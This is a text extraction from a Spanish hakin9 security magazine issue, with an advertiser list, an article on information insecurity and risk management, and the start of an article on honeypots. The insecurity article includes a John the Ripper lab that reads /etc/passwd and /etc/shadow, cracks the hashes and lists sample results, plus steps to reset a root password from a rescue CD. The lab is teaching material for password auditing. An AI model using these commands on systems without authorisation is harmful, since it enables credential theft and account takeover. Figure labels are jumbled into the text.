no es más que la soberbia comercial
a la que repito, la compañía de Bill
Gates nos tiene acostumbrado y que
dista mucho de la realidad.
Agradecimientos
A mis padres, que son mis imprescindibles
aliados, a mi mujer
Denise, la energía de mi esfuerzo,
y a mi querido amigo y socio Elias
Navarro. l

Club Pro
flag
solutions
I-SEC
Information Security Inc.
Somos una empresa dedicada y comprometida
integramente con la Seguridad de la Información.
Nuestros Servicios se adaptan a la
estructura de su empresa, recomendándole
qué es lo mejor para su crecimiento.
Contacto: www.i-sec.org
Ártica Soluciones
Tecnológicas
Ártica es una empresa de consultoría de capital
nacional formada por profesionales con experiencia
en el mundo de las Tecnologías de
Información. Nuestro ámbito de actuación está
centrado en diversos sectores: industria,
banca, proveedores de Internet, y telecomunicaciones.
Contacto: http://www.artica.es
Flag Solutions
FLAG Solutions es una consultoría tecnológica
que se apoya en 4 pilares básicos: la seguridad
informática, la ingeniería de sistemas, el
diseño corporativo y la formación especializada
para empresas. Proporcionamos soluciones
rentables tanto para la pequeña como para
la gran empresa.
Contacto: www.flagsolutions.net
Ecija Consulting
Somos una consultoría IT, líder en asesoramiento
integral de empresas. Nuestro equipo
formado por abogados, consultores y técnicos,
nos ha permitido especializarnos en el campo
de la seguridad informática, aportando a nuestras
soluciones el valor añadido del conocimiento
de la materia desde el punto de vista jurídico.
Contacto: www.ecija.com, buzon@ecija.com
Root-Secure
Somos una consultoría con un alto nivel de conocimientos
y experiencias en Information Security,
una empresa joven pero con profesionales
con una gran experiencia y reconocimiento
en el mercado. Dedicados de manera exclusiva,
a la Seguridad de la Información sin la visión
de un producto o una marca que vender o
defender, lo cual nos posiciona como una Empresa
con prestigio.
Contacto: www.root-secure.com
Más información: es@hakin9.org, tel.: 00 34 917 610 987
Suscripción anual + publicidad durante 12 meses
Seguridad0
Seguridad0 es una empresa española dedicada
a la distribución de productos de seguridad
informática y a la formación. Más información
en su Web corporativa: www.seguridad0.es.
Cuentan con una web dedicada a la
divulgación de noticias de seguridad informática:
http://www.seguridad0.com
Kinetic Solutions
Empresa especializada en implantación de soluciones
de seguridad informática con valor agregado,
brindamos servicios profesionales de protección
y detección a intrusiones informáticas.
Somos especialistas en diferentes materias de
seguridad de la información para atender a nuestros
clientes de organizaciones privadas y gubernamentales
en España y Sudamérica.
Contacto: info@kineticsl.com
JPL TSOLUCIO, SL.
Consultoría en seguridad informática y Tecnologías
de la Información: LOPD, copias de seguridad
(locales y en Internet), gestión avanzada
virus & spam, recuperación ante desastres,
planes de contingencia, redes seguras y monitorización
de sistemas & servidores. Para empresas
de cualquier tamaño. Consúltanos.
Contacto: info@tsolucio.com,
www.tsolucio.com
S.P.W S.L.
Soluciones de Seguridad
Estamos especializados en ofrecer productos de
fácil administración para el responsable de sistemas,
nuestras areas mas definidas son firewalls
Watchguard, unidades Anti-spam, asi como soluciones
antivirus y de backup de Symantec.
Puerto de Canencia, 15 Local 28038, Madrid
Tel. 91 3339250, Fax. 91 3339251
Contacto: spw@spw.es, www.spw.es
Internet Security Auditors
Desde el ano 2001 ofrecemos servicios de Auditoría,
Consultoría y Formación en Seguridad
en TI con un experto y reconocido equipo humano
en hacking ético, seguridad web, outsourcing
y normativas de seguridad. Hable con nosotros.
Y si la seguridad es lo tuyo y te apasiona, contacta
con nosotros.
Contacto: www.isecauditors.com

Inseguridad de la
información
Armando Carvajal
En Europa se utiliza con más frecuencia
la expresión Fiabilidad informática.
Un sistema de información se
considera seguro si se encuentra libre de
todo riesgo y daño, pero es imposible garantizar
la seguridad o la inviolabilidad absoluta
de un sistema informático, en el interesante
libro (Moron Lerma, Esther, (2002), Internet
y derecho penal: Hacking y otras conductas
ilícitas en la red. Editorial Aranzadi S.A) se
sugiere de preferencia utilizar el término fiabilidad.
Que es seguridad informática?
• un sistema de información se considera
seguro si se encuentra libre de todo riesgo
y daño.
• es imposible garantizar la seguridad o
la inviolabilidad absoluta de una sistema
informática por ello es preferible utilizar el
termino el termino fiabilidad.
No se podrá entender la seguridad informática
como un concepto cerrado consecuencia
de la aplicación mecánica de una serie
de métodos, sino como un proceso que
se puede ver comprometido en cualquier
momento de la forma menos sospechada,
34 www.hakin9.org/es
La inseguridad de la información
es el reto del encargado de la
seguridad de la información. Cada
nueva vulnerabilidad, cada nueva
falla identificada establece un
reto, no solamente para reparar
los daños y la falla, sino para
comprender la mente del intruso,
los elementos que intervienen en
la falla e identificar la evidencia de
los hechos materializados.
La Seguridad Informática es un proceso
continuo, donde la condición de los controles
de la institución es apenas un indicador
de su postura de seguridad. (FFIEC Information
Security IT Examination Handbook,
En este articulo aprenderás
• Confidencialidad: Los recursos del sistema solo
pueden ser accedidos por los elementos autorizados.
• Integridad: Los recursos del sistema solo
pueden ser modificados o alterados por los
elementos autorizados.
• Disponibilidad: Los recursos del sistema deben
permanecer accesibles a los elementos autorizados.
Lo que deberías saber
• Seguridad de la información: En esencia la
información es lo que mas nos importa proteger,
porque es propio de la organización
especifica, ya que sin duda alguna constituye
uno de los mayores activos de cualquier
organización.

Diciembre de 2002). La seguridad
informática es una idea subjetiva
(Schneier Bruce, Beyond Fear.
Thinking Sensibly about security
in an uncertain world. Copernicus
Books. 2003), mientras la inseguridad
informática es una idea
objetiva, es por ello que no es
fácil tener control absoluto sobre
la seguridad informática, porque lo
subjetivo es incierto, esto no ocurre
con la inseguridad informática,
que sabemos a ciencia cierta, que
nos va a ocurrir si continuamos
conviviendo irresponsablemente
con las vulnerabilidades y los
riesgos inherentes de nuestros
sistemas informáticos
¿Que es seguridad
informática?
• Seguridad informática es un
proceso continuo, donde la
condición de los controles de la
institución es un indicador de su
postura de seguridad.
• La inseguridad es una propiedad
inherente a los recursos informáticos,
la gestión es la única forma
de medirla y aminorarla.
La idea del seguro de vida ayuda
a explicar la naturaleza contradictoria
de los conceptos seguridad e
inseguridad informática, por ejemplo
cuando compramos un seguro
de vida estamos asegurando un
bien subjetivo la vida, lo hacemos
para garantizar que cuando ocurra
el siniestro, es decir para cuando
llegue la muerte, haya una indeminzación
por la falta de los ingresos
económicos que aportaba
el asegurado cuando este estaba
vivo. Notese que la muerte es
Este término se usa con mucha frecuencia en Europa
Que atacan?
• Propieclades
• _____________
• Conficlencialidad
• Integridad
• Disponibilidad
• Ataques
• _____________
• Modificacion:
webdefacement
• Fabricacion: Insertar
nuevo usuario
• Interceptacion: Key
loggers
• Interrupcion: Dos
Figura 1. Características de un
sistema seguro y los posibles
ataques
lo mas seguro en la vida, o ¿alguien
tiene dudas de que algún
día morirá?, por lo tanto lo mas
seguro en la vida es la muerte.
Entonces parece que hay un error
en el nombre que le da la aseguradora
a la póliza de seguros, se
le llama generalmente Seguro de
Vida cuando debería ser Seguro
de Muerte, es interesante que en
informática ocurra el mismo error:
decimos Seguridad Informática
cuando deberíamos decir Inseguridad
Informática.
La inseguridad informática es
pues una estrategia de reflexión y
acción para repensar la seguridad
informática como una disciplina
que es al mismo tiempo sentimiento
y realidad. (http://www.acis.org.co/
archivosAcis/Inseguridad.doc, Jeimy
Cano, 2004).
Propiedades
de un sistema seguro
Hay 3 variables o parámetros que
determinan el estado de un sistema
informático, estos son:
• Confidencialidad: Los recursos
del sistema solo pueden ser
accedidos por los elementos
autorizados
Importante
Por ello se deben destinar los recursos necesarios para su protección y uso en forma
controlada ya que constituye su conocimiento, su diferenciador ante la competencia y
los clientes, que finalmente determinan la continuidad del negocio.
Por favor medite esta pregunta: ¿Tiene dudas sobre la existencia de vulnerabilidades
y riesgos informáticos en su organización?
www.hakin9.org/es
35

kit
• Integridad: Los recursos del
sistema solo pueden ser modificados
o alterados por los
elementos autorizados
• Disponibilidad: Los recursos
del sistema deben permanecer
accesibles a los elementos autorizados
Tipos de ataques
Modificación: También llamados
webdefacement buscan comprometer
la confidencialidad y la integridad
del sistema, por ejemplo
cuando un atacante modifica la
página web de una organización
sin previa autorización
Propiedades de un sistema:
• Confidencialidad: los recurso
del sistema solo pueden ser
accedidos por los elementos
autorizados
• Integridad: los recurso del
sistema solo pueden ser modificados
o alterados por los
elementos autorizados
• Disponibilidad: los recurso del
sistema permanecer accesibles
a los elementos autorizados
Fabricación: comprometen la integridad
del sistema por ejemplo
al insertar un nuevo usuario en el
HIGH
LOW
1980
Password
Guessing
LOW
Habilidades
Requeridas
Self-Replicating
Code
Password
Cracking
Sofisticacion del Ataque
Figura 2. Ataques de los sistemas
sistema operativo Interceptación:
Busca comprometer la confidencialidad
del sistema, un ejemplo
son los key loggers o spyware y los
Sniffers Interrupción:
• Comprometen la propiedad Disponibilidad
un ejemplo serian
los ataques de denegación de
servicios o DoS. Veamos una
gráfica de que propiedades
buscan los ataques y su clasificación:
Grado de dificultad
para realizar un ataque
Hoy en día la mayoría de los ataques
están automatizados en CDs
auto ejecutables que son usados
por los atacantes y a su vez por
los auditores de seguridad para
evaluar los sistemas evaluados.
Estadísticamente se dice que a
medida que pasan los años es más
fácil hacer un ataque por que estos
estarán cada vez mejor documentados
y automatizados. Ver figura2:
Exploiting Know
Vulnerabilities
36 www.hakin9.org/es
1985
Disabling
A udits
Importante
Es recomendable seguir la norma internacional ISO/IEC 17799 que considera la organización
como un todo y tiene en cuenta todos los posibles aspectos que se pueden
ver afectados ante los posibles incidentes que se pueden producir.
Hijacking
Sessions
Backdoors
Sniffers
Sweepers
Packet
Spoofing
Central
Exploit
Repository
Satan
Stealth
Diagnostic
No se requieren habilidades técnicas
para hackear
Basados en el figura2 se concluye
que al pasar de los años será
mucho mas fácil hacer un ataque
contra un sistema vulnerable, llama
la atención el cruce de las coordenadas
x,y en el uso de Sniffers para
hacer ataques.
Activos que
se deben proteger
El concepto de seguridad lleva asociado
otro concepto que le da sentido:
El valor, solo se debe proteger
aquello que creemos tiene un valor
importante para nosotros, la seguridad
debe estar íntimamente asociada
al valor que le damos a los
objetos que deseamos proteger.
La información: En esencia la
información es lo que mas nos importa
proteger, porque es propio de
la organización especifica, ya que
sin duda alguna constituye uno de
los mayores activos de cualquier
organización.
Stack
Owerflw Back
E-Mail Worms
Orifice
Macro
Virus
Icmp
Tunneling
NMAP
1990 1995 2005
HIGH

Importante
El concepto de seguridad informática debe ser enfocado como un proceso global, por
esto se dice que desde el punto de vista legal la seguridad es el conjunto de bienes y
derechos personales o de la organización que deben ser protegidos y preservados,
tanto del mal uso involuntario como del uso ilícito.
Modelo de seguridad
informática PDCA
Dada la complejidad del problema de
la seguridad cuando se trata como un
todo dentro de la organización, surge
de forma natural la necesidad de la
gestión de la seguridad por lo que las
organizaciones deben plantearse un
sistema de gestión de la seguridad
de la información SGSI. El objetivo
primordial de los SGSI es salvaguardar
la información, para empezar
se debe identificar que activos de
información deben ser protegidos y
en que grado, luego debe aplicarse
el plan PDCA PLAN – DO – CHECK – ACT,
es decir Planificar, Hacer, Verificar,
Actuar y volver a repetir el ciclo. La
seguridad consiste en la realización
de las tareas necesarias para garantizar
los niveles de seguridad exigibles
en una organización:
• En consecuencia la organización
debe entender la seguridad como
Tabla 1. Activación de la Herramienta
Usuario Contraseña
texto en claro
PLANIFICAR
PLAN
HACER
DO
Figura 3. Esquema de evaluación ante un ataque
www.hakin9.org/es
Inseguridad de la información
un proceso que nunca termina
pues los riesgos nunca se eliminan
en cambio se gestionan. De
los riesgos se desprende que los
problemas de seguridad no son
únicamente de índole tecnológica
por ello nunca se eliminan en su
totalidad.
Un SGSI siempre cumple cuatro
niveles repetitivos que inician por
Planificar y termina en Actuar, reciclando
en mejoras continuas:
Análisis
de cada nivel
PLANIFICAR (Plan): Establecer el
contexto
• En este nivel se crean las Políticas
de seguridad,
• Se describe el alcance del SGSI,
• Se hace análisis de riesgos,
• Selección de controles,
• Estado de aplicabilidad.
Contraseña cifrada Segundos para
descifrar
Acarvaja Sis d/xIxxJYTO292 10,487
Acarvaja Sist Jt7jCsUUvCWJ 17,302
Acarvaja Siste P5hnpqJUASIzQ 15,044
Acarvaja Sistem LrxcAeTTDWOBs 16,004
Acarvaja Sistema hzYQLo1RxiIEQ 146,851
Acarvaja Sistemas gsZ.WUm.ozkgQ 2.604,277
MEJORAS CONTINUAS
VERIFICAR
CHECK
ACTUAR
ACT
HACER (Do): Implementar el sistema
• Implementar el sistema de gestión
de seguridad de la información,
• Implementar el plan de riesgos,
• Implementar los controles.
VERIFICAR (Check): Monitorea y
revisa
• Monitorea las actividades,
• Revisa,
• Hace auditorias internas.
ACTUAR (Act): Mantenimiento y
mejora
• Implementa mejoras,
• Acciones preventivas,
• Acciones correctivas.
El mayor problema
El mayor problema de hoy es que
los servicios que más utilizamos no
fueron pensados para ser seguros, es
decir la información viaja sin cifrar por
los canales inseguros. Los usuarios
mal intencionados utilizan herramientas
que se ponen a la escucha y pueden
ver todo el trafico de red, estas
herramientas se llaman sniffers. La
siguiente gráfica muestra un usuario
con el cliente de correo Outlook que
se siente seguro por que el cliente de
correo le pide la clave de la cuenta de
correo y pone asteriscos en la pantalla
para que este no sea observado. Lo
que el usuario común y corriente no
sabe es que el tráfico de la red puede
ser visto con un sniffer como el popular
ethereal. Definitivamente la única
forma para que los sniffers no vean los
datos en claro es cifrando el canal para
los puertos necesarios en la transferencia
de datos. Se dice que el uso
de la criptografía es la salvación para
proteger la confidencialidad en esta
nueva era de la información.
Capacitación en
seguridad Informática
Un plan de gestión de seguridad
informática no puede existir sin capacitación
especializada en las nuevas
amenazas y obviamente debe hacer
énfasis en como contrarrestar las
mismas. La certificación en seguridad
37

kit
que más se busca hoy en día es la
CISSP o profesional en seguridad informática
certificado, las estadísticas
muestran un 48% de preferencia. Le
siguen la GIAC, CISA, CISM, SSCP y
otras que empiezan a ser requeridas
por los profesionales de redes y seguridad
informática.
El rompecabezas: La red
La red de hoy es un rompecabezas
pues los profesionales en informática
deben hacer hablar e interactuar muchos
elementos activos de red de diferentes
fabricantes. El mayor objetivo
es tener indicadores correlacionados
entre las diferentes soluciones, es
decir se debería cruzar la información
de los diferentes logs del sistema de
seguridad. Gráficamente es como tener
un rompecabezas donde se tienen
tecnologías heterogéneas, software
de terceros, software hecho en casa,
proveedores de soluciones de seguri-
MOST WANTED
CERTIFICATIONS
Which certifications do you look for
when hiring or advancing security
personnel?
CSSF (Cetified informatior
Systems Security Professiona)
48%
GIAC (SANS Globa informatior on
Assurance Certifiation
26%
CSA (Cetified informatior
Security Auditor)
CSM (Cetified informatior
Security Manager)
CSM (Cetified informatior
Security Professional)
15%
Department of Defense
T A/CREF Security
7%
Other
None
7%
9%
20%
18%
16%
Figura 4. Certificaciones diguitales
de mayor uso
dad que no tienen interfaces entre sus
sistemas… ¿quien es el responsable
de integrar todos estos elementos
heterogéneos?
La respuesta es: Nosotros los
responsables de la informática en
nuestras organizaciones somos los
primeros llamados a tomar decisiones
al respecto, por eso este libro busca
ayudar en los primeros pasos, los
primeros auxilios para empezar tan
loable tarea.
Por lo tanto la primera tarea
que debemos tener en cuenta es el
análisis de riesgos, es decir antes
de empezar la tarea de gestión de
seguridad informática que busca la
implementación de controles por soluciones
existentes, primero se debe
hacer un análisis de riesgos que es el
paso fundamental de la gestión de la
seguridad informática
Rompiendo claves
con John The Ripper
Este es uno de los crackers más
populares de contraseñas. Puede
descargarse desde la URL
www.openwall.com/john/ y se halla
para distintos sistemas operativos,
aunque inicialmente se diseñó para
sistemas UNIX. Esta clase de información
debe ser accesible a cualquier
persona en forma pública pues
esto permite que la humanidad tenga
conciencia de que nuestros sistemas
críticos del negocio están siendo accedidos
por usuarios con contraseñas
débiles que así mismo debilitan nuestra
seguridad de la información. Estas
herramientas nos permiten a los administradores
del sistema comprobar
la solidez de las contraseñas para
disminuir ataques por fuerza bruta, y
ataques de diccionarios. Es decir per-
Cuestionamientos
38 www.hakin9.org/es
miten la comprobación proactiva de
las contraseñas. El conocer nuestras
debilidades nos permite mejorar las
políticas de seguridad.
La principal finalidad de este tipo
de programas es detectar passwords
débiles que vulneren la seguridad
del sistema. Su uso es legal, pues
su finalidad fundamental es la búsqueda
de passwords débiles que
vulneren el sistema de seguridad.
Ahora cualquier elemento puede ser
utilizado para fines buenos o malos,
solo nosotros decidimos el uso que
le damos.
Utilidades de estas
aplicaciones para
los administradores
de sistemas
Permiten probar las políticas de seguridad
en cuanto a los passwords débiles
para saber si se están respetando.
El administrador basado en los reportes
de john informa a los usuarios del
aseguramiento de sus claves.
Por ejemplo se debería programar
semanalmente la ejecución
de estas pruebas para evaluar la
fortaleza de los passwords de los
servidores. Cuando se encuentren
claves débiles se debe forzar
a los usuarios su cambio. Ahora
esto debe estar acompañado de
una política de seguridad que
dentro del sistema operativo y en
las aplicaciones del negocio no
se permitan: contraseñas de menos
de 8 caracteres, contraseñas
formadas con datos conocidos
del usuario, contraseñas que no
mezclen mayúsculas y minúsculas,
contraseñas formadas por palabras
de diccionarios y contraseñas que
ya se hayan usado antes.
• ¿Qué pasaría si la carpeta /etc estuviera en una partición independiente del sistema
de archivos root (/)?
• ¿Qué pasaría si la versión de Linux no fuera SUSE o Fedora?
• Fin de laboratorio
• ¿Qué pasaría si se olvida unificar los archivos /etc/passwd y /etc/shadow?
• ¿Qué pasaría si evitamos la unión de los archivos y en cambio solo utilizamos
/etc/shadow?
• Fin de Laboratorio

Activación
de la herramienta
Para activar la herramienta desde
un LIVE CD como por ejemplo
Knoppix STD, se deben seguir los
siguientes pasos:
# cp –vr /KNOPPIX/etc/john /tmp
Existe un archivo de claves muy
utilizadas llamado passwords.lst,
al ejecutar el comando wc –l
password.lst se encuentran unas
2290 líneas o palabras en el diccionario.
Al crear un usuario por ejemplo
acarvaja con el comando useradd
acarvaja debe notarse que
el password siempre contiene 13
caracteres sin importar el tamaño
de la clave de entrada, además se
encuentra que si se genera el mismo
password varias veces la clave
cifrada no es igual, esto se debe a
la SALT que son los dos primeros
caracteres de la contraseña.
Con el comando unshadow /etc/
passwd /etc/shadow > passwd.1 se
genera un solo archivo donde se
fusionan usuarios y su clave cifrada
respectivamente, pero también
funciona si usa /etc/shadow
Al ejecutar el comando: #
john passwd.1, se podrán ver las
claves en texto en claro. Al dejar
el password igual al nombre del
Sobre el Autor
Armando Carvajal es Ingeniero de Sistemas de la Universidad INCCA de Colombia
cuenta con un postgrado en Construcción de Software para redes de la universidad de
los Andes, actualmente esta cursando la maestría Seguridad Informática en la Universidad
Oberta de Cataluña (España). Se desempeña como gerente técnico de la empresa
Globaltek Security, organización especializada en seguridad informática. Ha sido
conferencista latinoamericano y tiene experiencia dictando postgrados de ingeniería de
sistemas en algunas universidades en Colombia.
Bibliografía
• Colobran Huguet, Miguel (2002): Administración de sistemas operativos en Zarza.
Barcelona: Universidad Oberta de Catalunia
• Moron Lerma, Esther: (2002) Internet y derecho penal: Hacking y otras conductas
ilícitas en la red, Editorial Aranzadi, S. A.
• Villalón Huerta, Antonio, (2002) Seguridad en Unix y redes. Version 2.1.
• Schneier Bruce, Beyond Fear. Thinking sensibly anout security in an ancertain
world. Copernicus Books 2003.
http://www.acis.org.co/archivosAcis/inseguridad.doc, Jeimy Cano, 2004
Evaluación
• ¿Cuales son las 3 propiedades que hacen de un sistema informático fiable o de lo
contrario inseguro?
• ¿Cuáles son los 4 grupos de ataque que pueden sufrir los componentes hardware,
software y los datos?
• ¿Defina desde el punto de vista del departamento jurídico o legal que es la seguridad
informática?
• ¿Qué activos que se deben proteger en seguridad Informática?
• ¿Que es el PDCA en seguridad Informática?
• ¿Por qué la capacitación especializada es fundamental en seguridad Informática?
• ¿Por qué la los riesgos nunca se pueden eliminar?
• ¿Que se gana al cifrar los canales con métodos criptográficos?
• ¿Por qué debería decirse inseguridad informática en cambio de seguridad informática?
www.hakin9.org/es
Inseguridad de la información
usuario se obtiene la siguiente
clave cifrada: DR4V/VN5epYJU,
el tiempo para descifrarlo en el
laboratorio fue de 2,403 seg. Si
usamos el password al revés como
el nombre del usuario: ajavraca se
obtiene la siguiente clave cifrada:
zYU39Cr4f14n, el tiempo para
descifrarlo fue de 2,704 seg. Si
se utiliza un password que satisfaga
las condiciones habituales de
seguridad: Con el texto en claro
@*?a200! se obtiene la siguiente
clave cifrada: geU8IZd0UCKCk,
pero no se puede descifrar la clave
después de 24 o 48 horas.
Definitivamente aumenta el
tiempo necesario en ciclos de
cpu al aumentar los caracteres
de la contraseña. Hay un resultado
de unos 15 segundos para
la contraseña siste, es decir para
5 caracteres, únicamente en esta
clave disminuye el tiempo mientras
que para el resto de la muestra
es creciente. Cuando se llega a 8
caracteres se necesitan unos 44
minutos en promedio, entonces
se puede concluir que siempre
debemos usar mínimo 8 caracteres
para las contraseñas seguras pues
el tiempo para romperlas seria mucho
mayor. Gráfica que relaciona
el tiempo de proceso contra el número
de caracteres. Pruebe ahora
cambiándole al usuario la clave por
una clave segura generada por el
sistema operativo:
# dd if=/dev/urandom count=200
bs=1 2>/dev/null | tr "\n" "
" | sed 's/[^a-zA-Z0-9]//g' | cut -c
-16
Use esas claves para ver cómo se
comporta la herramienta.
Conclusiones
Existen en Internet herramientas similares
para evaluar la vulnerabilidad de
las claves o passwords
• Son fáciles de encontrarlas y usarlas
• Es claro que el 90% de los passwords
son demasiado vulnerables
39

kit
• Pueden ser utilizadas para forzar
la entrada a un sistema cuando
originalmente fueron creadas para
probar la debilidad del password.
Laboratorio - Análisis
de las claves de usuarios
en un sistema Linux
Probar localmente las claves de los
usuarios localizados en el archivo /
etc/passwd y /etc/shadow
• Evaluar si la versión instalada funciona
Si ya esta instalado lo mas probable
es que la versión tenga problemas.
Se debe bajar el software en
formato tarbal desde el sitio: http:
//www.openwall.com/john/ y dejarlo en
el directorio: /tmp/john-1.x.tar.gz Luego
se descomprime con el comando: # tar
–xzvmf /tmp/john-1.x.tar.gz, Se posiciona
en el directorio recién creado, se
compila e instala con los comandos:
# cd /tmp/john-1.x
# cd src
# make generic
# cd ./run
• Unificar archivos con el comando:
# unshadow /etc/passwd/etc/shadow >
passwd.1
Esto genera un solo archivo donde se
fusionan usuarios y su clave cifrada
Ancho de Banda
Correo
Web
IDS
Análisis de
Vulnerabilidades
Antiespamy antivirus
Figura 5. El rompecabeza, la Red
respectivamente. Ejecute el comando
para ver el texto en claro:
# ./john passwd.1
Al ejecutar el comando anterior
aparece la pantalla diciendo que ha
encontrado un número de usuarios
para evaluar el algoritmo Standard
DES [32/32], además muestra por
cada usuario una lista de passwords
cifrados y su equivalente en texto en
claro. Los password encontrados
quedan en el archivo john.pot
• Evaluación de resultados
d/xIxxJYTO292:sis
Jt7jCsUUvCWJ.:sist
P5hnpqJUASIzQ:siste
LrxcAeTTDWOBs:sistem
hzYQLo1RxiIEQ:sistema
gsZ.WUm.ozkgQ:sistemas
MjB3da.tOE2B6:acarvaja
aKlHQkZTR8wY.:ajavraca
T6TfkAxv4Hw4U:aca
Laboratorio – Rompiendo
la contraseña del usuario
administrador
Se asume que el disco duro está
representado por el dispositivo /dev/
sda, donde /dev/sda1 es la primera
partición, /dev/sda2 representa la
segunda partición. Generalmente
los discos IDE se representan por /
dev/hda pero las versiones recientes
de Linux ven /dev/hda como /dev/sda
Firewall y Proxy
Filtro Web
Aplicaciones Críticas
End device
Broker de aplicaciones
40 www.hakin9.org/es
3000
2500
2000
1500
1000
500
0
Figura 6. Relación entre el tiempo
de proceso contra números de
caracteres
simulando discos SCSI o SATA.
Solución:
• Haga boot con el CDROM
• Tome la opción de recuperación
• En SUSE el sistema le pedirá el
usuario con el que hará el proceso
de emergencia, digite root
y presione la tecla enter
• Averigüe cual es la partición del
sistema de archivos root (/), para
ello digite en SUSE cfdisk /dev/
sda y en Linux Fedora fdisk /dev/
sda
• Para el comando fdisk tome la opción
1 y luego la letra p (print) para
imprimir las particiones del disco
duro
• Deduzca cual es la partición del
sistema de archivos root (/)
• Monte la partición del sistema de
archivos root en la carpeta /mnt del
cdrom
# mount /dev/sda1 /mnt
# chroot /mnt
• Verifique que existan las carpetas
y los archivos del sistema
root (/)
# cd /
3 4 5 6 7 8
# ls –l
• Si es correcto cambie el password
del usuario root
• passwd root
• Digite el nuevo password
• Salga a root
• cd /
• sync;sync;sync
• Reinicie el sistema
• reboot
• Pruebe entrar al sistema con la
nueva clave. l

El valor forense
de los honeypots
Armando Carvajal
Se define Honeypot como un recurso
de red destinado a ser atacado y
comprometido, este será examinado,
atacado y seguramente comprometido por el
atacante. Es una herramienta de seguridad
informática utilizada para recoger información
sobre los atacantes y sus técnicas. El
honeypot proporciona información sobre el
atacante antes de que se comprometan los
sistemas reales.
Que no hace un Honeypot:
• No sirve para eliminar o corregir fallos de
seguridad existentes
• Si la red es vulnerable, añadir un Honeypot
no resolverá esas fallas
• Evitar que un atacante fije su interés en
nuestra red
Características de un Honeypot
• Genera un volumen pequeño de datos
• No existen los falsos positivos
• Necesitan recursos informáticos mínimos
• Son elementos pasivos
• Son fuentes potenciales de riesgo para la red
42 www.hakin9.org/es
Los honeypots se muestran
como la trampa perfecta
para todos aquellos posibles
atacantes, su labor radica
en simular ser vulnerables o
debiles al ataque, captando
toda la información de sus
agresores una vez diagnosticado
al agresor, advierte al
administrador del sistema, antes
de dañar completamente la red.
• Usan una dirección IP como mínimo
• Los Honeypots tienen un limitado carácter
preventivo
• Tienen un alto grado de detección por los
intrusos de ahí que son conocidos como
tarros de miel
En este artículo aprenderás
• Cual cosa hacia o desde honeypots sera posible
realizar de manera anticipada una prueba o
scaneo.
• El uso de recursores y la simplicidad de su
aplicacion.
• Contrarestar ataques.
• Que es posible la implatación de ids, firewalls,
vpns, proxies, filtrosantispam, cifrado etc a favor
de la defensa de la información.
Lo que deberías saber
• Los honeypots, en algunas oportunidades son
de alto riesgo.
• La existencia de una muestra limitada.
• Recuerda que todo arma de seguridad posee
un riesgo.

• Son programables en cuanto a la
reacción contra el atacante
Taxonomia de los honeypots:
• Honeypot de producción (Production
Honeypot System)
• Honeypot de investigación (Research
Honeypot System)
Ubicación en el perímetro
Antes del firewall: Esta localización
es la que menos riesgo suministra
Listado 1. Comando If config: muestro de interfaces
El valor forense de los honeypots
a la red. Como este se encuentra
fuera de la zona protegida por el
firewall, puede ser atacado sin ningún
tipo de peligro para el resto de
la red. Detrás del firewall: El acceso
al Honeypot esta dirigido por las
reglas de filtrado del firewall, su
ubicación permite la detección de
los atacantes internos, los firewalls
mal configurados, las máquinas
infectadas por gusanos y los atacantes
externos. En la zona desmilitarizada:
Es la ubicación ideal pues
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:82 errors:0 dropped:0 overruns:0 frame:0
TX packets:82 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:5847 (5.7 Kb) TX bytes:5847 (5.7 Kb)
Listado 2. Construcion de un shell para probalo
#!/bin/sh
# Programa : ping.sh
# Autor: Armando Carvajal
# Parametros : Argumento $1 es el
numero de veces de secuencia
sec=1
while true
do
if [ $sec -gt $1 ]
then
exit 0
fi
ping -c 1 127.0.0.${sec}
sec=`expr $sec + 1`
done
Listado 3. Visualizacion del archivo resultado .txt
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.020 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.020/0.020/0.020/0.000 ms
PING 127.0.0.2 (127.0.0.2) 56(84) bytes of data.
64 bytes from 127.0.0.2: icmp_seq=1 ttl=64 time=0.011 ms
--- 127.0.0.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.011/0.011/0.011/0.000 ms
PING 127.0.0.3 (127.0.0.3) 56(84) bytes of data.
64 bytes from 127.0.0.3: icmp_seq=1 ttl=64 time=0.010 ms
…
--- 127.0.0.255 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.007/0.007/0.007/0.000 ms
www.hakin9.org/es
permite detectar ataques externos
e internos con una reconfiguración
del firewall.
Repercusiones legales
Trampa (Entrapment): Es el proceso
realizado por los cuerpos policiales
(law enforcement) de “inducir” a
alguien a cometer un acto punible
con el objetivo de iniciar la acción
judicial pertinente. En este caso del
Honeypot, aunque es un elemento
pasivo creado por nosotros para
ser atacado (sin que seamos parte
de los cuerpos policiales) si no deseamos
perseguir judicialmente esta
intrusión en el Honeypot, no realizamos
ninguna trampa. El objetivo del
Honeypot es recibir los ataques, no
recoger información para demandar
a los atacantes del Honeypot. Privacidad
(Privacy): La información
recogida puede dividirse en información
transaccional e información de
contenido.
Responsabilidad (Liability): Este
aspecto hace referencia a las posibles
demandas que podemos recibir
en el caso de que un atacante utilice
nuestro Honeypot como plataforma
de lanzamiento de ataques. Las demandas
se basarían en que nosotros
no hemos realizado unos mínimos
esfuerzos de seguridad en nuestra
red, sino que al contrario, facilitamos
el acceso a nuestros recursos para
que sean utilizados en todo tipo de
ataques.
Posibles utilidades
Los Honeypots son útiles para las
investigaciones forenses específicamente
en las investigaciones de
inteligencia porque permiten analizar
la actividad del hacker o atacante basados
en el engaño. Si ya se conoce
la identidad del atacante y además
usted va a tomar acciones contra
del atacante es importante recordar
que antes de poner el honeypot se
debe tener un permiso judicial contra
el atacante. Utilidad en sistemas en
producción: Brindan protección, prevención,
detección y respuesta a los
ataques de baja interacción. Utilidad
en la Investigación: Permite recolectar
información, ayuda a definir ten-
43

kit
dencias respecto de las actividades
del atacante, activación de sistemas
tempranos de alarma, predicción de
ataques e investigaciones criminales
con alta interacción. En concreto
permiten ejercer el derecho a la legítima
defensa.
Como ayudan en la
detección y solución de
problemas
Dado que su objetivo fundamental
es la construcción de un perfil del
atacante permite la detección de las
“0 days” vulnerabilidades que son
tan intimidantes como las amenazas
